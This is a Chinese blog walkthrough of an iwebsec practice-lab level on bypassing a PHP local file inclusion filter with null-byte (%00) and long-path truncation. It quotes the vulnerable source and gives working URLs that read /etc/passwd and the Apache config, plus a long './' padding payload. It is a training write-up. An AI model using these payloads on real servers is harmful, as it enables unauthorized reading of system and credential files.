iwebsec靶场 文件包含漏洞通关笔记2-文件包含绕过(截断法)

最新推荐文章于 2024-09-27 14:32:46 发布
最新推荐文章于 2024-09-27 14:32:46 发布
阅读量925 收藏 5
点赞数 1
分类专栏: iwebsec靶场 网络安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/128066063
版权

目录

前言

1.%00截断

2.文件字符长度截断法(又名超长文件截断)

方法1(路径截断法)

方法2(点号截断法)

第02关 文件包含绕过

1.打开靶场

2.源码分析

3.00文件截断原理

4.00截断的条件

5.文件包含00截断绕过

(1)访问test.txt

 (2)访问敏感文件

6.文件字符长度截断法(垃圾字符为./)

前言

文件包含漏洞中,在服务器执行一个PHP文件时可以通过文件包含函数执行另一个文件,无论这个文件是不是PHP为其后缀,都可以当成PHP执行。

文件上传的截断绕过通常源码包含如下字段,比如说传入的参数filename=phpinfo.txt,那么include时会为文件名加上 .html后缀,于是include的文件名就变为了phpinfo.txt.html,这样会导致文件包含漏洞利用出现失败。于是如何进行漏洞渗透,使得此时渗透过程中即便传入的参数为phpinfo.txt,但是包含的文件仍为phpinfo.txt,这个后缀.html加不到后面,就可以绕过这个文件包含的过滤了。

    $filename  = $_GET['filename'];
    include($filename . ".html");

通常来讲文件包含的绕过方法为%00截断以及字符长度截断法。

1.%00截断

前提是php<5.3.4且  magic_quotes_gpc=off,原理是%00是被会url解码成0x00,如果遇到0x00,就会认为读取已结束,所以导致截断。

2.文件字符长度截断法(又名超长文件截断)

方法1(路径截断法)

(1)前提是php版本<5.2.8
(2)Windows下目录最大长度为256字节,超出的部分会被丢弃;
(3)Linux下目录最大长度为4096字节,超出的部分会被丢弃。

方法2(点号截断法)

(1)仅适用windows系统

(2)当长度大于256B时才会造成扩展名截断

由于本关卡中iwebsec是搭建在docker中,使用linux系统故而只能使用路径截断法

第02关 文件包含绕过

1.打开靶场

iwebsec 靶场漏洞库iwebsecicon-default.png?t=N7T8http://iwebsec.com:81/fi/02.php

2.源码分析

如下所示,源码包含include函数具备文件包含漏洞

<?php

  require_once('../header.php');
  ?>
<html>
	<head>
		<title>本地文件包含绕过</title>
	</head>
	<h2>本地文件包含绕过</h2>
		<div class="alert alert-success">
			<p>/02.php?filename=test.txt%00 </p>
		</div>
	<body>
<?php
	if(isset($_GET['filename'])){
	
    $filename  = $_GET['filename'];
    include($filename . ".html");
	}else{
		exit();
	}
	
?>

不过文件包含的过程中,对filename的处理源码如下所示,是将文件名后加上.html的后缀,也就是如果filename=test,那么include的文件未test.html

    $filename  = $_GET['filename'];
    include($filename . ".html");

也就是说无论传入任意后缀的文件,尾部都会被加上.html后缀,那么考虑用%00截断方法,这样可以将后面的.html截断,include函数传入的参数仍为原始文件名

3.00文件截断原理

00/x00截断原理:0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。系统在对文件名的读取时,如果遇到0x00,就会认为读取已结束。这个可以用在对文件类型名的绕过上。
服务器在解析过程中,遇到ascii码为零的位置就停止,而这个ascii码为零的位置在16进制中是00,用0x开头表示16进制,也就是所说的0x00截断。

这样的话,如果我们要包含的文件名字为test.txt,在服务器拼接上.html后再被include,文件名变为了test.txt.html,这样就没有办法进行渗透

test.txt.html

假设此时我们要包含的文件名为test.txt%00,这时候在在服务器拼接上.html后再被include,文件名变为了test.txt%00.html

test.txt%00.html

由于%00截断的原理,服务器在将%00解码后,发生了截断功效,于是文件名便为

test.txt

这样就实现了文件包含%00绕过截断

4.00截断的条件

第一点:PHP的版本要小于5.3.4 <

第二点:php中的设置文件php.ini中的 magic_quotes_gpc 要关闭,

若想修改magic_quotes_gpc,需要修改php.ini文件,将magic_quotes_gpc关闭掉

5.文件包含00截断绕过

(1)访问test.txt

iwebsec 靶场漏洞库iwebsecicon-default.png?t=N7T8http://iwebsec.com:81/fi/02.php?filename=test.txt%00

 (2)访问敏感文件

访问/etc/passwd, 如下所示渗透成功

iwebsec 靶场漏洞库iwebsecicon-default.png?t=N7T8http://iwebsec.com:81/fi/02.php?filename=/etc/passwd%00

 访问Apache的httpd配置文件,如下所示渗透成功

iwebsec 靶场漏洞库iwebsecicon-default.png?t=N7T8http://iwebsec.com:81/fi/02.php?filename=/etc/httpd/conf/httpd.conf%00

6.文件字符长度截断法(垃圾字符为./)

在这里构造垃圾字符时,有一个小技巧使用word文档构造./././一直累加,直到字符数超过4096即可

构造如下url,垃圾字符的长度在linux系统中要超过4096

http://iwebsec.com:81/fi/02.php?filename=test.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

 如下所示渗透成功

mooyuan天天
关注
专栏目录
文件上传漏洞利用
m0_61506558的博客
10-09 1559
基于靶场的练习,决定把文件上传漏洞再进行总结,整体可以分为中间件解析漏洞、CMS漏洞、编辑器漏洞、CVE漏洞和其他,由于本人水平有限,如有问题,请师傅留言,一起进步!!!(一)基本介绍不理解漏洞原理的,可以看看下面文章哈文件上传漏洞__Cyber的博客-CSDN博客_常见的文件上传漏洞(二)利用思路对文件上传类型进行区分,是属于编辑器文件上传,还是属于第三方应用,还是会员中心。要确保文件上传是什么类型,就用什么类型方对它进行后期的测试。
iwebsec 文件包含篇 (已完结)
qq_60829702的博客
03-30 2378
iwebsec 文件包含,详细分析,持续更新
iwebsec靶场 文件上传漏洞通关笔记1-第01关 前端js过滤绕过
mooyuan的博客
12-04 2029
第01关 前端js过滤绕过1.禁用js(1)禁用js(2)刷新页面使生效(3)上传脚本(4)开启js并刷新页面2.修改页面1(1)右键查询元素(2)搜索关键字check(3)删除函数调用(4)上传脚本 (5)访问脚本3.bp改包(1)分析源码(2)将脚本后缀改为jpg(3)上传info.jpg并bp抓包(4)bp中将info.jpg改名为info.php并发送(5)访问脚本打开第一关靶场iwebsec 靶场漏洞库iwebsechttp://iwebsec.com:81/upload/01.php构
iwebsec靶场 解析漏洞通关笔记2-Nginx解析漏洞
最新发布
mooyuan的博客
09-27 1151
于是在访问http://192.168.71.151:8000/parse/index.jpg/x.php时,由于x.php不存在,PHP会递归向前解析,如果index.jpg存在就会把index.jpg当做PHP解析,造成了解析漏洞。http://x.x.x.x:8000/parse/index.jpg/x.php时,如果x.php不存在,PHP会递归向前解析,如果index.jpg存在就会把index.jpg当做PHP解析,造成了解析漏洞.在配置的过程中,查看nginx的php配置文件,如下所示。
CTF---Web---文件包含---04---%00截断
qq_22160557的博客
07-28 534
文章目录前言一、题目描述二、解题步骤1、 构造payload三、总结 前言 题目分类: CTF—Web文件包含—04—%00截断 一、题目描述 题目: 文件包含—boot.ini http://172.16.15.192/stage/8/show.php?name=says&path=test/ 二、解题步骤 1、 构造payload step1:修改name值,截断%00,还有路径匹配,即可爆出key:8DB4DDF1C46E764A http://172.16.15.192/stage/
文件包含漏洞(绕过姿势)
热门推荐
求天下者,积少成多
06-01 1万+
文件包含漏洞是渗透测试过程中用得比较多的一个漏洞,主要用来绕过waf上传木马文件。今日在逛Tools论坛时,发现了一种新型的文件包含姿势,在此记录分享,并附上一些文件包含漏洞的基础利用姿势。特殊姿势利用phar://协议特性可以在渗透过程中帮我们绕过一些waf检测,phar:// 数据流包装器自 PHP 5.3.0 起开始有效,貌似可以绕过安全狗。利用过程新建shell.php代码内容:123<?p
iwebsec靶场 文件包含漏洞通关笔记1-本地文件包含漏洞
mooyuan的博客
04-20 1955
文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。比如 在PHP中,提供了:这些文件包含函数,这些函数在代码设计中被经常使用到。
iwebsec靶场文件包含漏洞-session本地包含
qq_56041380的博客
04-02 450
当获取Session文件的路径并且Session的内容可控时,就可以通过包含Session文件进行攻击
iwebse靶场文件包含漏洞-本地文件包含
qq_56041380的博客
04-01 293
文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,文论文件是什么类型,文件内的恶意代码都会被解析并执行。 文件包含漏洞可能会造成服务器的网页被恶意篡改
Webug4.0靶场通关笔记(第七天)--------文件上传(all)
Yasso的博客
02-25 689
目录 一、文件上传(前端拦截) 二、文件上传(解析漏洞) 三、文件上传(畸形文件) 四、文件上传(截断上传) 五、文件上传(htaccess) 一、文件上传(前端拦截) 上传一句话木马抓包,改后缀为php,上传成功 连接蚁剑,成功,但我没找到flag。百度flag为sadfsadfsdadf。 二、文件上传(解析漏洞) 三、文件上传(畸形文件) ...
文件上传漏洞upload-labs-master
现代鲁滨逊的博客
11-22 559
关于这个靶场通关秘籍网上有比我写的更好的,比如:upload-labs-master-文件上传靶场通关笔记我就不详细写了. 文件上传是一个很常见的功能,比如上传图片,视频和其他类型的文件。 文件上传的一般流程: html等前端选择文件,选择本地文件后进行提交 浏览器形成POST MultiPart报文发送到服务器 服务器中间件(如Tomcat、Weblogic等)接收到报文,解析后交给相关的后端代码进行处理 写入到文件中,生成文件名(PHP特有的方:先生成临时文件,再根据后端代码将临时文件重命名移动到
xss-labs靶场学习笔记
qq_46117757的博客
07-22 150
level1 直接在url写入js语句 level2 keyword后面或文本框输入 ">闭合value属性 123"><script>alert(1);</script> level3 查看源代码 value属性使用单引号 在输入框输入以下代码 ,提交后鼠标移到输入框完成。 123' onmouseenter='alert(1); <!--即整个标签为--> <input name=keyword ...
MySQL数据库SQL注入靶场sqli通关实战(附靶场安装包)
悦分享
10-20 343
SQL注入是指web应用程序对用户输入数据的合性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。带入执行的参数能够可控;拼接的SQL语句能够带入数据库中,并执行;SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方
iwebsec靶场 文件包含漏洞通关笔记5-远程文件包含绕过
mooyuan的博客
04-20 1525
前言。
iwebsec靶场文件包含漏洞-php://input伪协议及利用
qq_56041380的博客
04-05 745
php://input可以访问请求的原始数据的只读流,即可以直接读取POST上没有经过解析的原始数据,但是使用enctype="multipart/form-data"的时候php://input是无效的。
文件包含常见绕过
1stPeak's Blog
06-15 7946
文件包含原理 开发人员将相同函数写入单独的文件中,需要使用某个函数直接调用此文件,无需再次编写,这种文件调用过程称为文件包含 文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞 相关函数 include: 包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行 include_once: 这个函数跟和include语句类似,唯一区别是如果该文件中已经被包含过,则不会再次包含 req
iwebsec靶场 解析漏洞通关笔记1-Apache解析漏洞
mooyuan的博客
04-28 1635
Apache服务器在解析一个文件时,当文件有多个以点分隔的后缀时,如果右边的后缀无识别(不在mime.types内),则继续从右向左识别,那么我们请求这样一个文件:ljn.php.aaa,遇到第一个扩展名 aaa ->发现无识别,于是从右向左 识别第二个扩展名php -> 发现后缀是php可以识别,于是交给php 处理。
iwebsec靶场文件上传漏洞-.htaccess文件上传
qq_56041380的博客
03-28 1356
.htaccess文件上传是利用.htaccess文件对Web服务器进行配置的功能,实现将扩展名为.jpg、.png等的文件当做PHP文件解析的过程
文件包含漏洞1 | iwebsec
weixin_52116519的博客
03-06 1203
正是这种灵活性, 从而导致客户端可以调用一个恶意文件,造成文件包含漏洞文件包含函数的参数没有经过过滤,可以被攻击者控制,包含其他恶意文件,导致了执行恶意的代码。PHP的文件包含可以直接执行包含文件的代码,包含的文件格式不受限制(无论是txt、图片文件还是远程URL,全都作为PHP代码执行),只要能正常执行即可。这个文件是我们通过文件上传点上传的,但是无解析,我们可以利用这里的文件包含漏洞解析。的文件包含漏洞,大多出现在模块加载、模板加载和cache调用的地方。文件,写入如下代码,即01环境的代码。
iwebsec靶场搭建
07-28
iwebsec靶场是一个漏洞集成容器,其中集成了大量的web漏洞环境,包括SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的漏洞环境。\[1\] 要搭建iwebsec靶场,可以使用docker来运行容器。可以使用以下命令来启动靶场并将宿主机的8001端口映射给iwebsec靶场的80服务: docker run --restart=always --name iwebsec -it -dp 8001:80 iwebsec/iwebsec \[2\] 这样每次启动靶场时,都会自动运行,并且宿主机的8001端口会映射给靶场的80服务。 需要注意的是,iwebsec靶场还包含一些漏洞渗透,如redis数据库漏洞和MySQL数据库漏洞。如果需要进行渗透测试,需要将iwebsec靶场中的redis服务端口号和MySQL服务端口号映射到主机端口中。可以使用以下命令来查找iwebsec的配置文件: find / -name iwebsec_info.md \[3\] #### 引用[.reference_title] - *1* [Web安全 iwebsec 靶场搭建.](https://blog.csdn.net/weixin_54977781/article/details/130341391)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [iwebsec靶场搭建](https://blog.csdn.net/mooyuan/article/details/128031434)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值